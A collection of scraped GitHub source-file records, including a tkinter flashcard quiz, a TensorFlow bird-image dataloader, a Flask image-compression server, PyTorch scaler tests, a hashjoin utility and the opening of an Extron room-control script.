+{"seq_id":"12106839337","text":"from tkinter import *\r\nfrom PIL import ImageTk,Image\r\nfrom random import randint\r\nimport random\r\n\r\nroot = Tk()\r\nroot.title(\"flashcards\")\r\nroot.iconbitmap(\"icons/superman.ico\")\r\nroot.geometry(\"600x600\")\r\n\r\n#creating a menubar\r\nmy_menu = Menu(root)\r\nroot.config(menu=my_menu)\r\n\r\nresult=0\r\n\r\n#create randpm chnage function\r\ndef change():\r\n \r\n global list1\r\n global rando\r\n #creating a list\r\n list1 = ['ntr_np','ntr_tem','ntr_jlk','prabhas','mahesh_sri',\r\n 'mahesh_ban','mahesh_maha']\r\n \r\n #creating a random int\r\n rando = randint(0,len(list1)-1)\r\n states = \"angel/\" + list1[rando] + \".png\"\r\n \r\n #inserting our images\r\n global my_label\r\n global my_pic\r\n my_pic = ImageTk.PhotoImage(Image.open(states))\r\n my_label.config(image=my_pic,bg=\"white\")\r\n \r\n \r\n#calling submitt button\r\n\r\ndef submit():\r\n global answer\r\n answer = e1.get().lower()\r\n if answer == list1[rando]:\r\n \r\n result = \"correct it is\" +\" \" + list1[rando]\r\n else:\r\n result = \"incorrect it is not correct answer\"\r\n my_label1 = Label(hero_frame,text=result,font=\"arial,25\")\r\n my_label1.pack(pady=15)\r\n e1.delete(0,END)\r\n#calling functions\r\ndef heroes():\r\n global my_label\r\n removeall()\r\n hero_frame.pack(fill=BOTH,expand=1)\r\n my_label = Label(hero_frame)\r\n my_label.pack(pady=15)\r\n change()\r\n \r\n #creating a entrybox\r\n global e1\r\n e1 = Entry(hero_frame,width=30)\r\n e1.pack()\r\n #creating a next button\r\n button1 = Button(hero_frame,text=\"next\",command=heroes)\r\n button1.pack(pady=15)\r\n \r\n #button to show mwssage\r\n button2 = Button(hero_frame,text=\"submit\",command=submit)\r\n button2.pack()\r\n \r\n#calling select function\r\ndef select():\r\n if radio_cap.get()==names[answer]:\r\n result=\"correct\"\r\n answerlabel.config(text=result)\r\n\r\ndef movies():\r\n removeall()\r\n state_frame_movies.pack(fill=BOTH,expand=1)\r\n my_label = Label(state_frame_movies)\r\n my_label.pack()\r\n global list1\r\n global rando\r\n global names\r\n global answer\r\n list1 = ['ntr_np','ntr_tem','ntr_jlk','prabhas','mahesh_sri',\r\n 'mahesh_ban','mahesh_maha']\r\n \r\n names = {\"ntr_np\":'nanakuprematho',\"ntr_tem\":'temper',\"ntr_jlk\":'jailavakusa',\r\n \"prabhas\":'saaho',\"mahesh_sri\":'srimanthudu',\"mahesh_ban\":'bharath ane nenu',\"mahesh_maha\":'maharshi'}\r\n \r\n #creating a random int\r\n \r\n count=1\r\n answer_list = []\r\n while count<4:\r\n \r\n rando = randint(0,len(list1)-1)\r\n \r\n if count == 1:\r\n \r\n \r\n answer = list1[rando]\r\n global my_pic\r\n states = \"angel/\" + list1[rando] + \".png\"\r\n my_pic = ImageTk.PhotoImage(Image.open(states))\r\n my_label.config(image=my_pic)\r\n \r\n \r\n answer_list.append(list1[rando])\r\n list1.remove(list1[rando])\r\n random.shuffle(list1)\r\n count+=1\r\n \r\n global radio_cap\r\n radio_cap=StringVar()\r\n radio_cap.set(names[answer_list[0]])\r\n \r\n radio_button1 = Radiobutton(state_frame_movies,text=names[answer_list[0]],variable=radio_cap,value=names[answer_list[0]]).pack()\r\n radio_button2 = Radiobutton(state_frame_movies,text=names[answer_list[1]],variable=radio_cap,value=names[answer_list[1]]).pack()\r\n radio_button3 = Radiobutton(state_frame_movies,text=names[answer_list[2]],variable=radio_cap,value=names[answer_list[2]]).pack()\r\n \r\n #creating a next button\r\n \r\n nxt_button = Button(state_frame_movies,text=\"next\",command=movies)\r\n nxt_button.pack()\r\n \r\n #creating a select button\r\n \r\n btselect = Button(state_frame_movies,text=\"select\",font=\"arial,20\",command=select)\r\n btselect.pack(pady=15)\r\n \r\n #creating answer label\r\n global answerlabel\r\n answerlabel = Label(state_frame_movies,text=\" \",font=\"arial,20\")\r\n answerlabel.pack(pady=15)\r\n \r\n\r\n#removing framses and deleting childrens \r\ndef removeall():\r\n #looping through for deleting frame children\r\n for widget in hero_frame.winfo_children():\r\n widget.destroy()\r\n for widget in state_frame_movies.winfo_children():\r\n widget.destroy()\r\n \r\n hero_frame.pack_forget()\r\n state_frame_movies.pack_forget()\r\n \r\n#creating submenu titles\r\ntollywood_menu = Menu(my_menu)\r\nmy_menu.add_separator()\r\nmy_menu.add_cascade(label=\"tollywood\",menu=tollywood_menu)\r\ntollywood_menu.add_command(label=\"heroes\",command=heroes)\r\ntollywood_menu.add_command(label=\"movies\",command=movies)\r\ntollywood_menu.add_command(label=\"exit\",command=root.destroy)\r\n\r\nhero_frame = Frame(root,width=500,height=500,bg=\"white\")\r\nstate_frame_movies = Frame(root,width=500,height=500,bg=\"yellow\")\r\n\r\n\r\n\r\nroot.mainloop()\r\n\r\n\r\n","repo_name":"vishnuvardhan1807/tkinter-projects","sub_path":"flashcaeds.py","file_name":"flashcaeds.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"20964646350","text":"import os\n#os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"-1\"\nimport tensorflow as tf\nimport numpy as np\n#from PIL import Image\n#import skimage\n#import tensorflow_datasets as tfds\n#import matplotlib.pyplot as plt\nfrom tensorflow.python.keras import backend as K\nfrom tqdm import tqdm\nimport pathlib\n\nBATCH_SIZE = 32\nIMG_HEIGHT = 448\nIMG_WIDTH = 448\nNUM_CLASSES = 200\n\n\nclass DataSet:\n\n def __init__(self, path_root):\n self.data_dir = pathlib.Path(path_root + '/CUB_200_2011/CUB_200_2011/images')\n self.image_path = path_root + \"/CUB_200_2011/CUB_200_2011/images/\"\n self.image_name_path = path_root + \"/CUB_200_2011/CUB_200_2011/images.txt\"\n self.semantics_path2 = path_root + \"/CUB_200_2011/CUB_200_2011/attributes/image_attribute_labels.txt\"\n self.semantics_path1 = path_root + \"/CUB_200_2011/attributes.txt\"\n self.split_path = path_root + \"/CUB_200_2011/CUB_200_2011/train_test_split.txt\"\n self.class_path = path_root + \"/CUB_200_2011/CUB_200_2011/classes.txt\"\n self.label_path = path_root + \"/CUB_200_2011/CUB_200_2011/image_class_labels.txt\"\n self.AUTOTUNE = tf.data.experimental.AUTOTUNE\n\n def load(self, GPU=True, train=True, batch_size=32):#discard\n index = self.get_split()\n if GPU:\n n = len(index)\n else:\n n = 50\n if train:\n #phi = self.get_phi(index)# Φ, semantic matrix, 28*200\n labels = self.get_label(n, index, set=0)\n images = self.get_image(n, index, set=0)\n else:\n labels = self.get_label(n, index, set=1)\n images = self.get_image(n, index, set=1)\n #phi = self.get_semantic(n, index, set=1) # φ, semantic features 28, n\n\n ds = tf.data.Dataset.from_tensor_slices((images, np.asarray(labels))).cache().shuffle(50).batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n\n return ds\n\n def prepare_for_training(self, ds, batch_size=32, cache=True):\n # This is a small dataset, only load it once, and keep it in memory.\n # use `.cache(filename)` to cache preprocessing work for datasets that don't\n # fit in memory.\n \"\"\"\n if cache:\n if isinstance(cache, str):\n ds = ds.cache(cache)\n else:\n ds = ds.cache()\n \"\"\"\n cache_dir = os.path.join(os.getcwd(), 'cache_dir')\n try:\n os.makedirs(cache_dir)\n except OSError:\n print('Cache directory already exists')\n cached = ds.cache(os.path.join(cache_dir, 'cache.temp'))\n ds = ds.shuffle(50).repeat().batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n\n return ds\n\n def get_label(self, n, index, set=0):\n file = open(self.label_path, \"r\")\n labels = file.readlines()\n label_new = []\n for i in range(n):\n if index[i] == set:\n label_new.append(int(labels[i].split(' ')[1].split('\\n')[0]) - 1)# start from 0\n\n return label_new\n\n def decode_img(self, img):\n # convert the compressed string to a 3D uint8 tensor\n img = tf.image.decode_jpeg(img, channels=3)\n # Use `convert_image_dtype` to convert to floats in the [0,1] range.\n img = tf.image.convert_image_dtype(img, tf.float32)\n # resize the image to the desired size.\n return tf.image.resize(img, [IMG_WIDTH, IMG_HEIGHT])\n\n def get_image(self, n, index, set=0):# discard\n images_names = open(self.image_name_path, \"r\")\n images = images_names.readlines()\n print(\"loading images...\")\n image_new = []\n for i in tqdm(range(n)):\n if index[i] == set:\n im_path = self.image_path + images[i].split(' ')[1].split('\\n')[0]\n #img = np.asarray(Image.open(im_path).resize((IMG_WIDTH, IMG_HEIGHT)), dtype=np.float32)\n img = tf.io.read_file(im_path)\n img = self.decode_img(img)\n # image = tf.keras.preprocessing.image.load_img(im_path, target_size=(IMG_WIDTH, IMG_HEIGHT))\n image_new.append(img)\n else:\n pass\n\n return image_new\n\n def get_attribute(self):\n file = open(self.semantics_path1, \"r\")\n lines = file.readlines()\n attributes = {}\n print(\"loading attributes...\")\n for line in lines:\n id = line.split(\" \")[0] # No. of attribute, 28 categories, 312 in total\n info = line.split(\" \")[1].split(\"::\")\n if info[0] in attributes.keys():\n attributes[info[0]] += [int(id)]\n else:\n attributes[info[0]] = [int(id)]\n\n return attributes\n\n def get_semantic(self, n, index, set=0, file_path=None):\n attributes = self.get_attribute()\n n_att = len(attributes.keys()) # 28\n birds_at = {}\n print(\"loading semantics...\")\n file = open(self.semantics_path2, \"r\")\n lines = file.readlines()\n for line in lines:\n id_bird = line.split(\" \")[0]\n if id_bird not in birds_at.keys():\n birds_at[id_bird] = np.zeros(n_att)\n\n id_att = int(line.split(\" \")[1])\n present = int(line.split(\" \")[2])\n if present:\n for i, key in enumerate(attributes.keys()):\n if id_att in attributes[key]:\n birds_at[id_bird][i] += np.where(np.array(attributes[key]) == id_att)[0][0]\n\n birds_semantics = [] # 11788*28 list\n for i, key in enumerate(birds_at.keys()):\n if i < n:\n if index[i] == set:\n birds_semantics.append(birds_at[key])\n else:\n pass\n else:\n break\n print(\"Finished!\")\n\n return np.asarray(birds_semantics)\n\n def get_split(self, index=True):\n file = open(self.split_path, \"r\")\n ids = file.readlines()\n if index:\n for i in range(len(ids)):#len(set)):\n ids[i] = int(ids[i].split(' ')[1].split('\\n')[0])\n return ids\n else:\n images_names = open(self.image_name_path, \"r\")\n images = images_names.readlines()\n print(\"splitting...\")\n train_list = []\n test_list = []\n for i in range(len(ids)):#len(set)):\n set = int(ids[i].split(' ')[1].split('\\n')[0])\n if set == 0:\n train_list.append(self.image_path + images[i].split(' ')[1].split('\\n')[0])\n else:\n test_list.append(self.image_path + images[i].split(' ')[1].split('\\n')[0])\n\n return tf.data.Dataset.from_tensor_slices(train_list), tf.data.Dataset.from_tensor_slices(test_list)#.cache()\n\n def get_phi(self):\n index = self.get_split(index=True)\n labels = self.get_label(len(index), index, set=0)\n semantics = self.get_semantic(len(index), index, set=0)\n phi = np.zeros((semantics[0].shape[0], max(labels)+1))\n lcount = {x:labels.count(x) for x in labels}\n for i in range(len(semantics)):\n phi[:, labels[i]] += semantics[i]\n for j in range(phi.shape[0]):\n phi[:, j] = phi[:, j] / lcount[j]\n\n return tf.convert_to_tensor(phi, dtype=tf.float32)\n\n def process_path(self, file_path):\n parts = tf.strings.split(file_path, '/')\n # The second to last is the class-directory\n label = int(tf.strings.split(parts[-2], '.')[0])# == self.CLASS_NAMES\n # load the raw data from the file as a string\n img = tf.io.read_file(file_path)\n img = self.decode_img(img)\n\n return img, label\n\n def load_gpu(self, batch_size=32):#autotune=4\n # Set `num_parallel_calls` so multiple images are loaded/processed in parallel.\n self.CLASS_NAMES = np.unique(\n np.array([item.name for item in self.data_dir.glob('[!.]*') if item.name != \"LICENSE.txt\"]))\n train_list_ds, test_list_ds = self.get_split(index=False)\n #dataset = train_list_ds.interleave(tf.data.TFRecordDataset, cycle_length=FLAGS.num_parallel_reads, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n train_ds = train_list_ds.map(self.process_path, num_parallel_calls=self.AUTOTUNE)\n test_ds = test_list_ds.map(self.process_path, num_parallel_calls=self.AUTOTUNE)\n train = self.prepare_for_training(train_ds, batch_size)\n test = self.prepare_for_training(test_ds, batch_size)\n for image, label in train.take(1):\n print(\"Image shape: \", image.numpy().shape)\n print(\"Label: \", label.numpy())\n\n return train, test\n\n def loadtfds(self, dataset_name, batch_size=32): #not working\n # Load data from tensorflow_datasets\n raw_train, raw_test = tfds.load(name=dataset_name, split=[\"train\", \"test\"], batch_size=32)\n train = raw_train.map(lambda x: tf.image.resize(x['image'], (IMG_WIDTH, IMG_HEIGHT)))\n test = raw_test.map(lambda x: tf.image.resize(x['image'], (IMG_WIDTH, IMG_HEIGHT)))\n ds_train = train.shuffle(1000).repeat().batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n ds_test = test.shuffle(1000).repeat().batch(batch_size).prefetch(tf.data.experimental.AUTOTUNE)\n # for batch in ds_train:\n # ...\n return ds_train, ds_test\n\n\nif __name__ == '__main__':\n print(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\n path_root = os.path.abspath(os.path.dirname(__file__)) # '/content/gdrive/My Drive/data'\n bird_data = DataSet(path_root)\n #train_ds = bird_data.load(GPU=True, train=True, batch_size=32)\n #ds_train, ds_test = bird_data.loadtfds('caltech_birds2011')\n ds_train, ds_test = bird_data.load_gpu(batch_size=4)\n \"\"\"\n filename1 = 'train_ds.tfrecord'\n writer1 = tf.data.experimental.TFRecordWriter(filename1)\n writer1.write(train_ds)\n #read\n #raw_dataset = tf.data.TFRecordDataset(filenames)\n \"\"\"\n #image_batch, label_batch = next(iter(ds_train))\n\n","repo_name":"LindsayXX/DD2412_project","sub_path":"final_model/dataloaderGPUs.py","file_name":"dataloaderGPUs.py","file_ext":"py","file_size_in_byte":10064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"13775607899","text":"import random\nimport string\n\nfrom util.base_augmentation_script import read_original_dataset, output_to_file\n\n\ndef replace_n_chars(n):\n ori_data = read_original_dataset()\n new_dataset = {}\n for command, intent in ori_data.items():\n length = len(command)\n for _ in range(n):\n pos = random.randint(0, length)\n change_to = random.choice(string.ascii_lowercase)\n command = command[:pos] + change_to + command[pos + 1:]\n new_dataset[command] = intent\n return new_dataset\n\n\nfor k in range(1, 10):\n data = replace_n_chars(k)\n output_to_file(data, f'./typo_dataset/data_with_{k}_typo.json')\n","repo_name":"SongyuWang-UO/VA_project","sub_path":"typo_dataset/argumentation_script.py","file_name":"argumentation_script.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"71863355776","text":"#Variables\nkernel_file='Luxur'\nenv=Environment()\nenv['CFLAGS']=' -Wall -fstrength-reduce -fomit-frame-pointer\\\n -finline-functions -nostdinc -fno-builtin\\\n -fno-stack-protector'\nenv['CCCOMSTR']='[C] $SOURCES'\nenv['ASCOMSTR']='[as] $SOURCES'\nenv['LINKCOM']='ld -T link.ld -o $TARGET $SOURCES'\nenv['LINKCOMSTR']='[LD] $SOURCES > $TARGET'\n\n\ndebug = ARGUMENTS.get('debug', 0)\nif int(debug):\n\tenv.Append(CCFLAGS = ' -g')\n\tenv['CCCOMSTR']='[C] [DBG] $SOURCES'\n\tenv['ASCOMSTR']='[AS][DBG] $SOURCES'\n\nlnkd = Builder(action = 'ld -T link.ld -o $TARGET $SOURCES')\nenv.Append(BUILDERS = {'Linkit' : lnkd})\n\nExport('env')\nobjs=(SConscript(['boot/SConscript',\n 'kernel/SConscript',\n\t\t 'lib/SConscript'],'env'))\n\n\n#linkeamos los Objetos en el kernel\nenv.Program(kernel_file,objs)\n","repo_name":"M4c0t/IndiaOS","sub_path":"LICENSE.md/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"9724489256","text":"import math\nimport pandas as pd\nimport simplepbr\nfrom direct.showbase.ShowBase import ShowBase\nfrom panda3d.core import *\n\nIMAGE_WIDTH = 640\nIMAGE_HEIGHT = 480\nCAMERA_FOV = (math.pi/180)*60\n\n\n\n\n\nclass MyApp(ShowBase):\n\t\n\tdef __init__(self):\n\t\t\n\t\tShowBase.__init__(self)\n\t\t#simplepbr.init()\n\t\t#myMaterial = Material()\n\t\t#myMaterial.setAmbient((1, 1, 1, 1)) # Make this material blue\n\t\talight = AmbientLight('alight')\n\t\talight.setColor((1.0, 1.0, 1.0, 1))\n\t\t\n\t\t\n\t\t# Load the environment model.\n\n\t\tself.scene = self.loader.loadModel(\"part.bam\")\n\t\tself.scene.setColor(1.0, 1.0, 1.0, 1.0)\n\t\talnp = self.scene.attachNewNode(alight)\n\t\tself.scene.setLight(alnp)\n\t\t#self.scene.setMaterial(myMaterial)\n\t\t\n\t\t# Reparent the model to render.\n\n\t\tself.scene.reparentTo(self.render)\n\n\t\t# Apply scale and position transforms on the model.\n\n\t\tself.scene.setScale(0.25, 0.25, 0.25)\n\n\t\tself.scene.setPos(-8, 42, 0)\n\n\n'''Returns a Pandas DataFrame with predefined fields'''\ndef init_df():\n\tdata = pd.DataFrame(\n\t\t\t{'filename': pd.Series(dtype='str'), 'class': pd.Series(dtype='str'), 'id': pd.Series(dtype='int'), 'cam_pos': pd.Series(dtype='str'),\n\t\t\t 'cam_axis': pd.Series(dtype='str'), 'part_pos': pd.Series(dtype='str')} )\n\treturn data\n\t\t\n\nif __name__ == \"__main__\":\n\tdata = init_df()\n\tdata.loc[len(data.index)] = ['test', 'part', 0, '[3;3;-3]', '[-3;-3;3]', '[0;0;0]']\n\t\n\tapp = MyApp()\n\tapp.run()\n","repo_name":"OzzyP97/KONE.533-Automated-Data-Generation-Setup","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"20532494993","text":"import logging\nfrom sqlalchemy.orm import Session\n\nfrom app.models import models\nfrom app import schemas\n\nfrom datetime import datetime\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s %(message)s\",\n handlers=[\n logging.FileHandler(\"/tmp/VideoConfLog.log\"),\n logging.StreamHandler()\n ]\n)\nlogger = logging.getLogger(\"VideoConfLog\")\n\n\ndef create_conference(db: Session):\n db_item = models.VideoConference()\n db.add(db_item)\n db.commit()\n\n return db_item\n","repo_name":"adamteale/video_conference_example","sub_path":"backend/app/app/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"}
+{"seq_id":"34966962370","text":"from collections import deque\n\nn, m, start = map(int, input().split())\nvertexList = [ [] for _ in range(n+1) ]\ncheck = [False]*(n+1)\n\nfor _ in range(m):\n u, v = map(int, input().split())\n vertexList[u].append(v)\n vertexList[v].append(u)\nfor i in range(1, n+1):\n vertexList[i].sort() \n\ndef dfs(x):\n global check\n check[x] = True\n print(x, end=' ')\n for adjacentVertex in vertexList[x]:\n if check[adjacentVertex] == False:\n dfs(adjacentVertex)\n\ndef bfs(x):\n check = [False]*(n+1)\n q = deque()\n q.append(x)\n check[x] = True\n while q:\n next_vertex = q.popleft()\n print(next_vertex, end=' ')\n for adjacentVertex in vertexList[next_vertex]:\n if check[adjacentVertex] == False:\n check[adjacentVertex] = True\n q.append(adjacentVertex)\n\ndfs(start)\nprint()\nbfs(start)","repo_name":"kizarrd/algorithm_with_python","sub_path":"dfs_and_bfs/acmicpc1260.py","file_name":"acmicpc1260.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"41923353643","text":"from flask import Flask, request, send_from_directory, send_file, make_response\nfrom flask_cors import CORS\nfrom time import perf_counter\n\nfrom compress.lib import compressImage\n\napp = Flask(__name__,\n static_folder=None)\n\ncors = CORS(app,\n resources={\n r'/api/*' : {\n 'origins' : '*',\n 'expose_headers': ['Compress-Time']\n }})\n\n@app.route('/api/compress', methods=['POST'])\ndef compress_route():\n try:\n file = request.files['file']\n ratio = int(request.form['rate'])\n\n startTime = perf_counter()\n result = compressImage(file, ratio)\n endTime = perf_counter()\n\n response = make_response(send_file(result, mimetype=file.mimetype))\n response.headers['Compress-Time'] = endTime - startTime\n return response\n except:\n return '', 501\n\n@app.route('/', defaults={ 'path': 'index.html' })\n@app.route('/')\ndef catch_all(path):\n return send_from_directory('./client/dist', path)\n","repo_name":"hilyafadhilah/Algeo02-20017","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"8874161521","text":"import unittest\n\nimport numpy as np\nimport torch\nfrom torch.nn import Conv2d, Module, ReLU, MaxPool2d, Linear, LogSoftmax\n\nfrom torch_pp import StandardScaler\nfrom torch_pp.minmaxscaler import MinMaxScaler\n\n\nclass Cnn(Module):\n def __int__(self, num_channels: int, classes: int):\n super(self).__init__()\n self.scaler = StandardScaler()\n self.conv1 = Conv2d(in_channels=num_channels, out_channels=20, kernel_size=(5, 5))\n self.relu1 = ReLU()\n self.maxpool1 = MaxPool2d(kernel_size=(2, 2), stride=(2, 2))\n self.fc2 = Linear(in_features=500, out_features=classes)\n self.logSoftmax = LogSoftmax(dim=1)\n\n def forward(self, x):\n x = self.scaler.fit_transform(x)\n x = self.conv1(x)\n x = self.relu1(x)\n x = self.maxpool1(x)\n x = self.fc2(x)\n output = self.logSoftmax(x)\n return output\n\n\nclass TestScalers(unittest.TestCase):\n def test_standard_scaler_transform(self):\n input_x = torch.from_numpy(np.array([[20., 1.], [-3., 700.], [-11., 3.]])).to(dtype=torch.double)\n scaler = StandardScaler()\n transformed_x = scaler.fit_transform(input_x)\n transformed_back_x = scaler.inverse_transform(transformed_x)\n torch.testing.assert_close(input_x, transformed_back_x)\n\n def test_minmax_scaler_transform(self):\n input_x = torch.from_numpy(np.array([[20., 1.], [-3., 700.], [-11., 3.]])).to(dtype=torch.float64)\n scaler = MinMaxScaler()\n transformed_x = scaler.fit_transform(input_x)\n transformed_back_x = scaler.inverse_transform(transformed_x)\n torch.testing.assert_close(input_x, transformed_back_x)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Pravuk/torch-preprocessing","sub_path":"torch_pp/test_.py","file_name":"test_.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39488664230","text":"#!/usr/bin/env python\n\"\"\"\nNAME:\n\n hashjoin: join a small lookup table with unsorted targets\n\nDESCRIPTION:\n\nI wanted a quick way to annotate lines with additional metadata\nfrom a lookup file. I had a set of UUIDS and human readable\nlabels, and a set of target files that would be decorated by combining\nthe input line with the lookup value when the lookup key was present\nin the line.\n\nsample lookup: key value\n\nid1 Item 1\nid2 Another item\n\ntarget:\n\nThis is id1 and other stuff\nAnd here id2 is here\n\n\nThe join linux join command requires sorted input.\nHowever, given a small lookup table hashjoin allows for\njoining of unsorted lookup and target table(s).\n\nhashjoin.py uses the first field of the lookup as the key,\nand then \n\nAUTHOR:\n\n Jud Dagnall \n\nEXAMPLES:\n\n # common usage:\n hashjoin \n\n\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nimport fileinput\nimport json\nimport logging\nimport re\nimport sys\n\nTIMESTAMP_FORMAT='%(asctime)s %(levelname)s - %(message)s'\n\ndef parse_args(args=None):\n desc=\"\"\n p = argparse.ArgumentParser(description=desc)\n #p.add_argument('', help=\"default: %(default)s\", default='')\n p.add_argument('-d', '--delimiter', \n help=\"regex delimiter for lookup table\",\n default='\\s+')\n p.add_argument('-D', '--debug', action='store_true',\n help='enable debugging')\n p.add_argument('-o', '--only', action='store_true', \n help=\"print only lines with matches\")\n p.add_argument('-O', '--output-delimiter', \n help=\"output delimiter. default = space\",\n default=\" \")\n p.add_argument('-T', '--tab-output', action='store_true',\n help=\"use tab as the output delimiter\")\n p.add_argument('lookup', help='whitespace delimited lookup')\n p.add_argument('targets', nargs='*', \n help='targets for lookup')\n\n \n # accept arguments as a param, so we\n # can import and run this module with a commandline-like\n # syntax.\n if args is None: \n args = sys.argv[1:]\n return p.parse_args(args)\n\ndef run(opts):\n logging.debug(\"starting\")\n lookups = {}\n if opts.tab_output:\n opts.output_delimiter = \"\\t\"\n\n delimiter = re.compile(opts.delimiter)\n\n for line in open(opts.lookup):\n k, v = re.split(delimiter, line.rstrip(\"\\n\"), 1)\n lookups[k] = v\n logging.debug('\"%s\" -> \"%s\"', k, v)\n\n logging.debug(\"lookups: %s\", lookups)\n for line in fileinput.input(opts.targets):\n line = line.rstrip(\"\\n\")\n matched = False\n for pattern, extra in lookups.items():\n if pattern in line:\n line = line + opts.output_delimiter + extra\n matched = True\n logging.debug('matched %s', pattern)\n break\n if matched or not opts.only:\n print(line)\n\nif __name__ == '__main__':\n opts = parse_args(sys.argv[1:])\n debug_level = logging.DEBUG if opts.debug else logging.INFO\n logging.basicConfig(level=debug_level ,format=TIMESTAMP_FORMAT)\n run(opts)\n","repo_name":"thejud/scripts","sub_path":"bin/hashjoin.py","file_name":"hashjoin.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"13816834773","text":"#!/usr/bin/env python3\n\nimport os\nimport numpy as np\nfrom functools import reduce\n\nfile = \"input.txt\"\n\ndata = np.array([line.rstrip('\\n') for line in open(file)])\nbit_length = len(data[0])\ndata_length = len(data)\ncommon_array = [0 for _ in range(bit_length)]\nprint(common_array)\nfor line in data:\n for i, bit in enumerate(line):\n if bit == '0':\n common_array[i] -= 1\n elif bit == '1':\n common_array[i] += 1\nprint(common_array)\n\ngamma = 0\nfor co in common_array:\n gamma = gamma << 1\n if co > 0:\n gamma += 1\n elif co == 0:\n print('Something fishy')\n\nepsilon = (gamma^(2**(bit_length)-1))\nprint(f\"Gamma {gamma:>08b}\")\nprint(f\"Epilson {epsilon:>08b}\")\nprint(f\"Power {gamma*epsilon:>08b}\")\nprint(f\"Power {gamma*epsilon}\")\n\n\n# second\nmost_co_data = np.array([[int(i) for i in line] for line in data])\nfor bit_i in range(bit_length):\n if len(most_co_data) == 1:\n break\n most_common = -((len(most_co_data)+1)//2) + sum(most_co_data[:,bit_i])\n if most_common >= 0:\n most_common = 1\n else:\n most_common = 0\n most_co_data = np.array([dat for dat in most_co_data if dat[bit_i]==most_common])\noxy = reduce(lambda a, b: ((a<<1) + b), most_co_data[0])\nprint(f\"Oxy:\\t\\t{oxy}\")\nprint(f\"Oxy:\\t\\t{oxy:>08b}\")\n\nlest_co_data = np.array([[int(i) for i in line] for line in data])\nfor bit_i in range(bit_length):\n if len(lest_co_data) == 1:\n break\n lest_common = -(len(lest_co_data+1))//2 + sum(lest_co_data[:,bit_i])\n if lest_common >= 0:\n lest_common = 0\n else:\n lest_common = 1\n lest_co_data = np.array([dat for dat in lest_co_data if dat[bit_i]==lest_common])\nco2 = reduce(lambda a, b: ((a<<1) + b), lest_co_data[0])\nprint(f\"CO2:\\t\\t{co2}\")\nprint(f\"CO2:\\t\\t{co2:>08b}\")\n\nprint(f\"Life support:\\t{co2*oxy}\")\n","repo_name":"fridewald/aco2021","sub_path":"03/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"34744483391","text":"\"\"\"--------------------------------------------------------------------------\n Business | Asesores y Consultores en Tecnología S.A. de C.V.\n Programmer | Dyanko Cisneros Mendoza\n Customer | Human Quality\n Project | Meeting Room\n Version | 0.1 --------------------------------------------------------- \"\"\"\n\n## CONTROL SCRIPT IMPORT -------------------------------------------------------\nfrom gui import TLP, BTN, BTNPAGE, BTNGROUP, BTNSTATE, LBL, LVL, POPUP, PAGE\nfrom extronlib import event, Version\nfrom extronlib.device import eBUSDevice, ProcessorDevice, UIDevice\nfrom extronlib.interface import (ContactInterface, DigitalIOInterface, \\\n EthernetClientInterface, EthernetServerInterfaceEx, FlexIOInterface, \\\n IRInterface, RelayInterface, SerialInterface, SWPowerInterface, \\\n VolumeInterface)\nfrom extronlib.ui import Button, Knob, Label, Level\nfrom extronlib.system import Clock, MESet, Wait\n\n## MODULE IMPORT ---------------------------------------------------------------\n## IP:\nimport extr_matrix_DXPHD4k_Series_v1_1_1_0 as DeviceA\nimport extr_other_MediaPort200_v1_1_0_0 as DeviceB\nimport csco_vtc_SX_Series_TC73_v1_3_0_0 as DeviceC\nimport biam_dsp_TesiraSeries_v1_5_20_0 as DeviceD\nimport lutr_lc_CasetaWirelessSmartBridgePro_v1_0_2_0 as DeviceE\n## RS-232:\nimport smfy_controller_RS485_RTS_Transmitter_v1_0_0_0 as DeviceF\n## IR/Serial\n\nprint(Version())\n\n## PROCESOR DEFINITION ---------------------------------------------------------\nIPCP = ProcessorDevice('IPlink')\n\n## IP:\nMATRIX = DeviceA.EthernetClass('10.10.10.10', 23, Model='DXP 88 HD 4k')\nBRIDGE = DeviceB.EthernetClass('10.10.10.11', 23, Model='MediaPort 200')\nCISCO = DeviceC.EthernetClass('10.10.10.12', 23, Model='SX20 TC7.3.X')\nBIAMP = DeviceD.EthernetClass('192.168.10.150', 23, Model='TesiraFORTE CI')\nLUTRON = DeviceE.EthernetClass('192.168.10.15', 23, Model='Caseta Wireless Smart Bridge Pro')\n## RS-232:\nSOMFY = DeviceF.SerialClass(IPCP, 'COM1', Baud=9600, Model='RS485 RTS Transmitter')\n\n## INITIALIZATE ----------------------------------------------------------------\ndef initialize():\n 